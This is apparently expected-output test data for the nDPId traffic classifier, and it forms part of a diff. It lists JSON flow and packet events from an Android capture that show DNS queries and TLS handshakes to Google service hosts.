00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":274,"source":"android.pcap","alias":"nDPId-test","flow_id":43,"flow_packet_id":1,"flow_last_seen":1582454871292,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":79,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":79,"pkt_l4_len":45,"thread_ts_msec":1582454871292,"pkt":"xiwDYGpkTGr2n\/YnCABFAABBq9RAAEARCXbAqAIQwKgCAbUXADUALUF1Da4BAAABAAAAAAAACGFjY291bnRzBmdvb2dsZQNjb20AAAEAAQ=="}
00774{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":274,"source":"android.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454871292,"flow_last_seen":1582454871292,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1582454871292,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":46359,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"Web"},"dns": {"query":"accounts.google.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
00507{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":276,"source":"android.pcap","alias":"nDPId-test","flow_id":43,"flow_packet_id":2,"flow_last_seen":1582454871294,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":95,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":95,"pkt_l4_len":61,"thread_ts_msec":1582454871294,"pkt":"TGr2n\/YnxiwDYGpkCABFAABRfN0AAEAReF3AqAIBwKgCEAA1tRcAPWwTDa6BgAABAAEAAAAACGFjY291bnRzBmdvb2dsZQNjb20AAAEAAcAMAAEAAQAAANoABNjvJng="}
00789{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":276,"source":"android.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1582454871292,"flow_last_seen":1582454871294,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":53,"flow_tot_l4_payload_len":90,"flow_avg_l4_payload_len":45,"midstream":0,"thread_ts_msec":1582454871294,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":46359,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"Web"},"dns": {"query":"accounts.google.com","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"216.239.38.120"}}
00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":280,"source":"android.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454871321,"flow_last_seen":1582454871321,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1582454871321,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"216.239.38.120","src_port":32998,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":280,"source":"android.pcap","alias":"nDPId-test","flow_id":44,"flow_packet_id":1,"flow_last_seen":1582454871321,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1582454871321,"pkt":"xiwDYGpkTGr2n\/YnCABFAAA8nfFAAEAG2qrAqAIQ2O8meIDmAbsuQarwAAAAAKAC\/\/\/zCgAAAgQFtAQCCAr\/\/zcBAAAAAAEDAwg="}
00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":284,"source":"android.pcap","alias":"nDPId-test","flow_id":44,"flow_packet_id":2,"flow_last_seen":1582454871334,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1582454871334,"pkt":"TGr2n\/YnxiwDYGpkCABFAAA8saEAAHUG0frY7yZ4wKgCEAG7gOY64cVhLkGq8aAS6yCKsAAAAgQFZAQCCAofL14G\/\/83AQEDAwg="}
00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":286,"source":"android.pcap","alias":"nDPId-test","flow_id":44,"flow_packet_id":3,"flow_last_seen":1582454871335,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1582454871335,"pkt":"xiwDYGpkTGr2n\/YnCABFAAA0nfJAAEAG2rHAqAIQ2O8meIDmAbsuQarxOuHFYoAQAVei8wAAAQEICv\/\/NwUfL14G"}
00918{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":288,"source":"android.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1582454871321,"flow_last_seen":1582454871339,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1582454871339,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"216.239.38.120","src_port":32998,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"accounts.google.com","ja3":"66918128f1b9b03303d77c6f2eefd128","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":280,"source":"android.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454871321,"flow_last_seen":1582454871321,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1582454871321,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"216.239.38.120","src_port":32998,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":280,"source":"android.pcap","alias":"nDPId-test","flow_id":44,"flow_packet_id":1,"flow_last_seen":1582454871321,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1582454871321,"pkt":"xiwDYGpkTGr2n\/YnCABFAAA8nfFAAEAG2qrAqAIQ2O8meIDmAbsuQarwAAAAAKAC\/\/\/zCgAAAgQFtAQCCAr\/\/zcBAAAAAAEDAwg="}
00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":284,"source":"android.pcap","alias":"nDPId-test","flow_id":44,"flow_packet_id":2,"flow_last_seen":1582454871334,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1582454871334,"pkt":"TGr2n\/YnxiwDYGpkCABFAAA8saEAAHUG0frY7yZ4wKgCEAG7gOY64cVhLkGq8aAS6yCKsAAAAgQFZAQCCAofL14G\/\/83AQEDAwg="}
00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":286,"source":"android.pcap","alias":"nDPId-test","flow_id":44,"flow_packet_id":3,"flow_last_seen":1582454871335,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1582454871335,"pkt":"xiwDYGpkTGr2n\/YnCABFAAA0nfJAAEAG2rHAqAIQ2O8meIDmAbsuQarxOuHFYoAQAVei8wAAAQEICv\/\/NwUfL14G"}
00918{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":288,"source":"android.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1582454871321,"flow_last_seen":1582454871339,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1582454871339,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"216.239.38.120","src_port":32998,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"accounts.google.com","ja3":"66918128f1b9b03303d77c6f2eefd128","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":291,"source":"android.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454871343,"flow_last_seen":1582454871343,"flow_idle_time":180000,"flow_min_l4_payload_len":52,"flow_max_l4_payload_len":52,"flow_tot_l4_payload_len":52,"flow_avg_l4_payload_len":52,"midstream":0,"thread_ts_msec":1582454871343,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":35689,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
00507{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":291,"source":"android.pcap","alias":"nDPId-test","flow_id":45,"flow_packet_id":1,"flow_last_seen":1582454871343,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":94,"pkt_l4_len":60,"thread_ts_msec":1582454871343,"pkt":"xiwDYGpkTGr2n\/YnCABFAABQq9VAAEARCWbAqAIQwKgCAYtpADUAPJHqlgwBAAABAAAAAAAAE3NlbWFudGljbG9jYXRpb24tcGEKZ29vZ2xlYXBpcwNjb20AAAEAAQ=="}
00797{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":291,"source":"android.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454871343,"flow_last_seen":1582454871343,"flow_idle_time":180000,"flow_min_l4_payload_len":52,"flow_max_l4_payload_len":52,"flow_tot_l4_payload_len":52,"flow_avg_l4_payload_len":52,"midstream":0,"thread_ts_msec":1582454871343,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":35689,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.GoogleServices","breed":"Acceptable","category":"Web"},"dns": {"query":"semanticlocation-pa.googleapis.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
00959{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":298,"source":"android.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1582454871321,"flow_last_seen":1582454871370,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":1935,"flow_avg_l4_payload_len":276,"midstream":0,"thread_ts_msec":1582454871370,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"216.239.38.120","src_port":32998,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"accounts.google.com","ja3":"66918128f1b9b03303d77c6f2eefd128","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
00959{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":298,"source":"android.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1582454871321,"flow_last_seen":1582454871370,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":1935,"flow_avg_l4_payload_len":276,"midstream":0,"thread_ts_msec":1582454871370,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"216.239.38.120","src_port":32998,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"accounts.google.com","ja3":"66918128f1b9b03303d77c6f2eefd128","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
00529{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":310,"source":"android.pcap","alias":"nDPId-test","flow_id":45,"flow_packet_id":2,"flow_last_seen":1582454871383,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":110,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":110,"pkt_l4_len":76,"thread_ts_msec":1582454871383,"pkt":"TGr2n\/YnxiwDYGpkCABFAABgqGIAAEARTMnAqAIBwKgCEAA1i2kATI9glgyBgAABAAEAAAAAE3NlbWFudGljbG9jYXRpb24tcGEKZ29vZ2xlYXBpcwNjb20AAAEAAcAMAAEAAQAAALIABKzZFEo="}
00812{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":310,"source":"android.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1582454871343,"flow_last_seen":1582454871383,"flow_idle_time":180000,"flow_min_l4_payload_len":52,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":120,"flow_avg_l4_payload_len":60,"midstream":0,"thread_ts_msec":1582454871383,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":35689,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.GoogleServices","breed":"Acceptable","category":"Web"},"dns": {"query":"semanticlocation-pa.googleapis.com","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"172.217.20.74"}}
00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":324,"source":"android.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454871496,"flow_last_seen":1582454871496,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1582454871496,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":22850,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
@@ -221,48 +221,48 @@
00770{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":324,"source":"android.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454871496,"flow_last_seen":1582454871496,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1582454871496,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":22850,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.DataSaver","breed":"Fun","category":"Web"},"dns": {"query":"proxy.googlezip.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
00507{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":332,"source":"android.pcap","alias":"nDPId-test","flow_id":46,"flow_packet_id":2,"flow_last_seen":1582454871536,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":95,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":95,"pkt_l4_len":61,"thread_ts_msec":1582454871536,"pkt":"TGr2n\/YnxiwDYGpkCABFAABRnZYAAEARV6TAqAIBwKgCEAA1WUIAPff70TGBgAABAAEAAAAABXByb3h5CWdvb2dsZXppcANuZXQAAAEAAcAMAAEAAQAAAJMABKzZFEw="}
00784{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":332,"source":"android.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1582454871496,"flow_last_seen":1582454871536,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":53,"flow_tot_l4_payload_len":90,"flow_avg_l4_payload_len":45,"midstream":0,"thread_ts_msec":1582454871536,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":22850,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.DataSaver","breed":"Fun","category":"Web"},"dns": {"query":"proxy.googlezip.net","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"172.217.20.76"}}
00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":335,"source":"android.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454871553,"flow_last_seen":1582454871553,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1582454871553,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"172.217.20.76","src_port":43634,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":335,"source":"android.pcap","alias":"nDPId-test","flow_id":47,"flow_packet_id":1,"flow_last_seen":1582454871553,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1582454871553,"pkt":"xiwDYGpkTGr2n\/YnCABFAAA8o7ZAAEAGEyjAqAIQrNkUTKpyAbt9gJSNAAAAAKAC\/\/\/OqgAAAgQFtAQCCAr\/\/zc7AAAAAAEDAwg="}
00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":336,"source":"android.pcap","alias":"nDPId-test","flow_id":47,"flow_packet_id":2,"flow_last_seen":1582454871591,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1582454871591,"pkt":"TGr2n\/YnxiwDYGpkCABFAAA8n5IAAHUGIkys2RRMwKgCEAG7qnIP+mJJfYCUjqAS6yAAJQAAAgQFZAQCCAqRSuAV\/\/83OwEDAwg="}
00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":337,"source":"android.pcap","alias":"nDPId-test","flow_id":47,"flow_packet_id":3,"flow_last_seen":1582454871592,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1582454871592,"pkt":"xiwDYGpkTGr2n\/YnCABFAAA0o7dAAEAGEy\/AqAIQrNkUTKpyAbt9gJSOD\/piSoAQAVcYYgAAAQEICv\/\/N0WRSuAV"}
00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":335,"source":"android.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454871553,"flow_last_seen":1582454871553,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1582454871553,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"172.217.20.76","src_port":43634,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":335,"source":"android.pcap","alias":"nDPId-test","flow_id":47,"flow_packet_id":1,"flow_last_seen":1582454871553,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1582454871553,"pkt":"xiwDYGpkTGr2n\/YnCABFAAA8o7ZAAEAGEyjAqAIQrNkUTKpyAbt9gJSNAAAAAKAC\/\/\/OqgAAAgQFtAQCCAr\/\/zc7AAAAAAEDAwg="}
00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":336,"source":"android.pcap","alias":"nDPId-test","flow_id":47,"flow_packet_id":2,"flow_last_seen":1582454871591,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1582454871591,"pkt":"TGr2n\/YnxiwDYGpkCABFAAA8n5IAAHUGIkys2RRMwKgCEAG7qnIP+mJJfYCUjqAS6yAAJQAAAgQFZAQCCAqRSuAV\/\/83OwEDAwg="}
00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":337,"source":"android.pcap","alias":"nDPId-test","flow_id":47,"flow_packet_id":3,"flow_last_seen":1582454871592,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1582454871592,"pkt":"xiwDYGpkTGr2n\/YnCABFAAA0o7dAAEAGEy\/AqAIQrNkUTKpyAbt9gJSOD\/piSoAQAVcYYgAAAQEICv\/\/N0WRSuAV"}
00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":338,"source":"android.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454871600,"flow_last_seen":1582454871600,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1582454871600,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":58892,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
00489{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":338,"source":"android.pcap","alias":"nDPId-test","flow_id":48,"flow_packet_id":1,"flow_last_seen":1582454871600,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":79,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":79,"pkt_l4_len":45,"thread_ts_msec":1582454871600,"pkt":"xiwDYGpkTGr2n\/YnCABFAABBq\/ZAAEARCVTAqAIQwKgCAeYMADUALTc\/5u4BAAABAAAAAAAACGFjY291bnRzBmdvb2dsZQNjb20AAAEAAQ=="}
00774{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":338,"source":"android.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454871600,"flow_last_seen":1582454871600,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1582454871600,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":58892,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"Web"},"dns": {"query":"accounts.google.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
00507{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":339,"source":"android.pcap","alias":"nDPId-test","flow_id":48,"flow_packet_id":2,"flow_last_seen":1582454871601,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":95,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":95,"pkt_l4_len":61,"thread_ts_msec":1582454871601,"pkt":"TGr2n\/YnxiwDYGpkCABFAABRUPMAAEARpEfAqAIBwKgCEAA15gwAPWHd5u6BgAABAAEAAAAACGFjY291bnRzBmdvb2dsZQNjb20AAAEAAcAMAAEAAQAAANoABNjvJng="}
00789{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":339,"source":"android.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1582454871600,"flow_last_seen":1582454871601,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":53,"flow_tot_l4_payload_len":90,"flow_avg_l4_payload_len":45,"midstream":0,"thread_ts_msec":1582454871601,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":58892,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"Web"},"dns": {"query":"accounts.google.com","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"216.239.38.120"}}
00913{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":340,"source":"android.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1582454871553,"flow_last_seen":1582454871614,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1582454871614,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"172.217.20.76","src_port":43634,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DataSaver","breed":"Fun","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"proxy.googlezip.net","ja3":"66918128f1b9b03303d77c6f2eefd128","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":342,"source":"android.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454871623,"flow_last_seen":1582454871623,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1582454871623,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"216.239.38.120","src_port":33002,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":342,"source":"android.pcap","alias":"nDPId-test","flow_id":49,"flow_packet_id":1,"flow_last_seen":1582454871623,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1582454871623,"pkt":"xiwDYGpkTGr2n\/YnCABFAAA8E0lAAEAGZVPAqAIQ2O8meIDqAbtXpCQEAAAAAKAC\/\/9QRAAAAgQFtAQCCAr\/\/zdNAAAAAAEDAwg="}
